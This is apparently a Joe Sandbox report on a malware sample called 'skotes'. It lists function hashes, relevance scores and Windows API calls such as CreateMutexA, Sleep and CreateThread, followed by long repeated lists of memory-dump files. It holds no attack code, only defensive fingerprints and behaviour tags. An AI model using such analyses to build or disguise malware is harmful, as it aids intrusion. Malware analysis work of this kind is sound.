Opcode ID: 255fb27593e2c62da186783a3c87b2d6327d0dbb9450b8d0293d459768afdfcc
Instruction ID: f016833f9b2819dea3977cbe904be2c62acca91fef3db879450b109c6bb50b1c
Opcode Fuzzy Hash: 255fb27593e2c62da186783a3c87b2d6327d0dbb9450b8d0293d459768afdfcc
Instruction Fuzzy Hash: 0931663562A1048BFB08EB78DDC9B6DB766EF81314F24821AE0159B2D5CF7599A08B12

Function 0028A7B7 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 130sleepsynchronizationCOMMON

Download Yara Rule

APIs

GetFileAttributesA.KERNEL32(00000000), ref: 0028A7BA
Sleep.KERNEL32(00000064,?), ref: 0028A963
CreateMutexA.KERNEL32(00000000,00000000,002E3254), ref: 0028A981

Strings

T2., xrefs: 0028A970

Memory Dump Source

Source File: 00000006.00000002.3297457709.0000000000281000.00000040.00000001.01000000.00000008.sdmp, Offset: 00280000, based on PE: true

Associated: 00000006.00000002.3296564843.0000000000280000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3297457709.00000000002E2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3299138671.00000000002E9000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3299367462.00000000002EB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3300307618.00000000002F7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3301774924.000000000044F000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3302083816.0000000000452000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3302546330.0000000000468000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3302546330.0000000000473000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3304173393.00000000004A4000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3304808458.00000000004A5000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3305449229.00000000004AC000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3305809725.00000000004B6000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3306517544.00000000004CD000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3306849998.00000000004CE000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3307187321.00000000004CF000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3308051969.00000000004D7000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3309195394.00000000004E0000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3310844862.00000000004E7000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3312051088.00000000004E8000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3312449400.00000000004EA000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3312808925.00000000004F3000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3313023487.00000000004F4000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3313292834.00000000004FC000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3313557778.0000000000501000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3313712501.0000000000509000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3313903846.000000000050A000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3314063316.000000000050B000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3314233348.0000000000513000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3314233348.000000000054E000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3314922438.000000000057F000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3315383384.0000000000580000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3316156788.0000000000589000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3316341586.0000000000596000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3316515374.0000000000597000.00000080.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_280000_skotes.jbxd

Yara matches

Similarity

API ID: AttributesCreateFileMutexSleep
String ID: T2.
API String ID: 396266464-2773616320
Opcode ID: 0e965e092173fad01a59931d853ed883de67d4d30252a58c8cfb7c4cad0359fc
Instruction ID: 90a0736c2c10ec49a8e70d1690d7885512620d65d651b4790fd00a913eff14d0
Opcode Fuzzy Hash: 0e965e092173fad01a59931d853ed883de67d4d30252a58c8cfb7c4cad0359fc
Instruction Fuzzy Hash: 59316831B2A1048BFB08EB7CDDC9B6CB766AF81314F24821AE005972D1DF7599A18722

Function 0028A960 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 43sleepsynchronizationCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(00000064,?), ref: 0028A963
CreateMutexA.KERNEL32(00000000,00000000,002E3254), ref: 0028A981

Strings

T2., xrefs: 0028A970

Memory Dump Source

Source File: 00000006.00000002.3297457709.0000000000281000.00000040.00000001.01000000.00000008.sdmp, Offset: 00280000, based on PE: true

Associated: 00000006.00000002.3296564843.0000000000280000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3297457709.00000000002E2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3299138671.00000000002E9000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3299367462.00000000002EB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3300307618.00000000002F7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3301774924.000000000044F000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3302083816.0000000000452000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3302546330.0000000000468000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3302546330.0000000000473000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3304173393.00000000004A4000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3304808458.00000000004A5000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3305449229.00000000004AC000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3305809725.00000000004B6000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3306517544.00000000004CD000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3306849998.00000000004CE000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3307187321.00000000004CF000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3308051969.00000000004D7000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3309195394.00000000004E0000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3310844862.00000000004E7000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3312051088.00000000004E8000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3312449400.00000000004EA000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3312808925.00000000004F3000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3313023487.00000000004F4000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3313292834.00000000004FC000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3313557778.0000000000501000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3313712501.0000000000509000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3313903846.000000000050A000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3314063316.000000000050B000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3314233348.0000000000513000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3314233348.000000000054E000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3314922438.000000000057F000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3315383384.0000000000580000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3316156788.0000000000589000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3316341586.0000000000596000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3316515374.0000000000597000.00000080.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_280000_skotes.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID: T2.
API String ID: 1464230837-2773616320
Opcode ID: d25de9c05e7d697bb89db6d91aede55e9b779b8d7a5b16d97953df8bf4e770e4
Instruction ID: b1db9667230c0c198726308eaef0d89788fb13071ae48511ed80c8634b3b8528
Opcode Fuzzy Hash: d25de9c05e7d697bb89db6d91aede55e9b779b8d7a5b16d97953df8bf4e770e4
Instruction Fuzzy Hash: 2CE086216ED205A5F71076A969CEF2962548FF570DF211915EB06CB0D0CD5469604623

Function 00287590 Relevance: 4.7, APIs: 3, Instructions: 158sleepthreadCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(00000064,3C8350B4,?,00000000,002C9138,000000FF), ref: 002875CC
CreateThread.KERNEL32(00000000,00000000,00287430,002E8638,00000000,00000000,?,?,?,?,?,?,?,?), ref: 002876BF
Sleep.KERNEL32(000001F4,?,?,?,?,?,?,?,?,?,?,?,?), ref: 002876C9

Part of subcall function 0029D0C7: RtlWakeAllConditionVariable.NTDLL ref: 0029D17B

Memory Dump Source

Source File: 00000006.00000002.3297457709.0000000000281000.00000040.00000001.01000000.00000008.sdmp, Offset: 00280000, based on PE: true

Associated: 00000006.00000002.3296564843.0000000000280000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3297457709.00000000002E2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3299138671.00000000002E9000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3299367462.00000000002EB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3300307618.00000000002F7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3301774924.000000000044F000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3302083816.0000000000452000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3302546330.0000000000468000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3302546330.0000000000473000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3304173393.00000000004A4000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3304808458.00000000004A5000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3305449229.00000000004AC000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3305809725.00000000004B6000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3306517544.00000000004CD000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3306849998.00000000004CE000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3307187321.00000000004CF000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3308051969.00000000004D7000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3309195394.00000000004E0000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3310844862.00000000004E7000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3312051088.00000000004E8000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3312449400.00000000004EA000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3312808925.00000000004F3000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3313023487.00000000004F4000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3313292834.00000000004FC000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3313557778.0000000000501000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3313712501.0000000000509000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3313903846.000000000050A000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3314063316.000000000050B000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3314233348.0000000000513000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3314233348.000000000054E000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3314922438.000000000057F000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3315383384.0000000000580000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3316156788.0000000000589000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3316341586.0000000000596000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3316515374.0000000000597000.00000080.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_280000_skotes.jbxd

Yara matches

Similarity

API ID: Sleep$ConditionCreateThreadVariableWake
String ID:
API String ID: 79123409-0
Opcode ID: 3f71f65037b0c0fc73222bbdd66ce7648c43ad3db9dcd1a9745963803501eb49
Instruction ID: 5fdd66bb4c20d9c292623a3d741a4639e36e5a8bdc8a13233289f44e5d6f0100
Opcode Fuzzy Hash: 3f71f65037b0c0fc73222bbdd66ce7648c43ad3db9dcd1a9745963803501eb49
Instruction Fuzzy Hash: 265123712612849BEB04DF28ECC9F8C7BA9EB45304F644619F9589B3D1CB7AD4A0CF41

Function 002B6E4C Relevance: 3.1, APIs: 2, Instructions: 89COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.3297457709.0000000000281000.00000040.00000001.01000000.00000008.sdmp, Offset: 00280000, based on PE: true

Associated: 00000006.00000002.3296564843.0000000000280000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3297457709.00000000002E2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3299138671.00000000002E9000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3299367462.00000000002EB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3300307618.00000000002F7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3301774924.000000000044F000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3302083816.0000000000452000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3302546330.0000000000468000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3302546330.0000000000473000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3304173393.00000000004A4000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3304808458.00000000004A5000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3305449229.00000000004AC000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3305809725.00000000004B6000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3306517544.00000000004CD000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3306849998.00000000004CE000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3307187321.00000000004CF000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3308051969.00000000004D7000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3309195394.00000000004E0000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3310844862.00000000004E7000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3312051088.00000000004E8000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3312449400.00000000004EA000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3312808925.00000000004F3000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3313023487.00000000004F4000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3313292834.00000000004FC000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3313557778.0000000000501000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3313712501.0000000000509000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3313903846.000000000050A000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3314063316.000000000050B000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3314233348.0000000000513000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3314233348.000000000054E000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3314922438.000000000057F000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3315383384.0000000000580000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3316156788.0000000000589000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3316341586.0000000000596000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3316515374.0000000000597000.00000080.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_280000_skotes.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6d79bfadc6d9a3a5b305d499f8d76d7887b56b0cab6faa265a733944192e5098
Instruction ID: 9234aab2f4092264c3d299df8e897546358c08e5b38cf91ba66cc3ec8bf79fc9
Opcode Fuzzy Hash: 6d79bfadc6d9a3a5b305d499f8d76d7887b56b0cab6faa265a733944192e5098
Instruction Fuzzy Hash: 1321D6329141096AEB217B68EC46FEF3729DF413B8F200311F9642B1C1DB749E259AA1

Function 00296D00 Relevance: 3.0, APIs: 2, Instructions: 14sleepthreadCOMMON

Download Yara Rule

APIs

CreateThread.KERNEL32(00000000,00000000,Function_00016C70,00000000,00000000,00000000), ref: 00296D11
Sleep.KERNEL32(00007530), ref: 00296D25

Memory Dump Source

Source File: 00000006.00000002.3297457709.0000000000281000.00000040.00000001.01000000.00000008.sdmp, Offset: 00280000, based on PE: true

Associated: 00000006.00000002.3296564843.0000000000280000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3297457709.00000000002E2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3299138671.00000000002E9000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3299367462.00000000002EB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3300307618.00000000002F7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3301774924.000000000044F000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3302083816.0000000000452000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3302546330.0000000000468000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3302546330.0000000000473000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3304173393.00000000004A4000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3304808458.00000000004A5000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3305449229.00000000004AC000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3305809725.00000000004B6000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3306517544.00000000004CD000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3306849998.00000000004CE000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3307187321.00000000004CF000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3308051969.00000000004D7000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3309195394.00000000004E0000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3310844862.00000000004E7000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3312051088.00000000004E8000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3312449400.00000000004EA000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3312808925.00000000004F3000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3313023487.00000000004F4000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3313292834.00000000004FC000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3313557778.0000000000501000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3313712501.0000000000509000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3313903846.000000000050A000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3314063316.000000000050B000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3314233348.0000000000513000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3314233348.000000000054E000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3314922438.000000000057F000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3315383384.0000000000580000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3316156788.0000000000589000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3316341586.0000000000596000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3316515374.0000000000597000.00000080.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_280000_skotes.jbxd

Yara matches

Similarity

API ID: CreateSleepThread
String ID:
API String ID: 4202482776-0
Opcode ID: 24a2c32c98c4ac6cbe00ff1cb1710767b41505f420939ab22abd09806c493aee
Instruction ID: cadd928b5d761404256b4e3081f047cb8bcac71a47ce273a2256fa86a11aa111
Opcode Fuzzy Hash: 24a2c32c98c4ac6cbe00ff1cb1710767b41505f420939ab22abd09806c493aee
Instruction Fuzzy Hash: EBD08C30BE5314B6FA2003202C0FF66AA509B0AF82F24084173083F0E082E0340047E8

Function 00288380 Relevance: 1.7, APIs: 1, Instructions: 159COMMON

Download Yara Rule

APIs

GetNativeSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00288524

Memory Dump Source

Source File: 00000006.00000002.3297457709.0000000000281000.00000040.00000001.01000000.00000008.sdmp, Offset: 00280000, based on PE: true

Associated: 00000006.00000002.3296564843.0000000000280000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3297457709.00000000002E2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3299138671.00000000002E9000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3299367462.00000000002EB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3300307618.00000000002F7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3301774924.000000000044F000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3302083816.0000000000452000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3302546330.0000000000468000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3302546330.0000000000473000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3304173393.00000000004A4000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3304808458.00000000004A5000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3305449229.00000000004AC000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3305809725.00000000004B6000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3306517544.00000000004CD000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3306849998.00000000004CE000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3307187321.00000000004CF000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3308051969.00000000004D7000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3309195394.00000000004E0000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3310844862.00000000004E7000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3312051088.00000000004E8000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3312449400.00000000004EA000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3312808925.00000000004F3000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3313023487.00000000004F4000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3313292834.00000000004FC000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3313557778.0000000000501000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3313712501.0000000000509000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3313903846.000000000050A000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3314063316.000000000050B000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3314233348.0000000000513000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3314233348.000000000054E000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3314922438.000000000057F000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3315383384.0000000000580000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3316156788.0000000000589000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3316341586.0000000000596000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3316515374.0000000000597000.00000080.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_280000_skotes.jbxd

Yara matches

Similarity

API ID: InfoNativeSystem
String ID:
API String ID: 1721193555-0
Opcode ID: bfe78834a021fbae5168787faf9176a56380090eb069dba5c28f1bfd87911951
Instruction ID: a1f8421175d5014cd6b36fd1ae7192545a764fab63ba986e6b6dc4410cb3af47
Opcode Fuzzy Hash: bfe78834a021fbae5168787faf9176a56380090eb069dba5c28f1bfd87911951
Instruction Fuzzy Hash: EF5135759252189BDB24FB68CD457DDB778EF45310FD04298E805A72C1DF349AA08F91

Function 002B7124 Relevance: 1.6, APIs: 1, Instructions: 56timeCOMMON

Download Yara Rule

APIs

SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?,?,?,?,002B705B,?,?,00000000,00000000), ref: 002B7166

Memory Dump Source

Source File: 00000006.00000002.3297457709.0000000000281000.00000040.00000001.01000000.00000008.sdmp, Offset: 00280000, based on PE: true

Associated: 00000006.00000002.3296564843.0000000000280000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3297457709.00000000002E2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3299138671.00000000002E9000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3299367462.00000000002EB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3300307618.00000000002F7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3301774924.000000000044F000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3302083816.0000000000452000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3302546330.0000000000468000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3302546330.0000000000473000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3304173393.00000000004A4000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3304808458.00000000004A5000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3305449229.00000000004AC000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3305809725.00000000004B6000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3306517544.00000000004CD000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3306849998.00000000004CE000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3307187321.00000000004CF000.00000080.00000001.01000000.00000008.sdmpDownload File
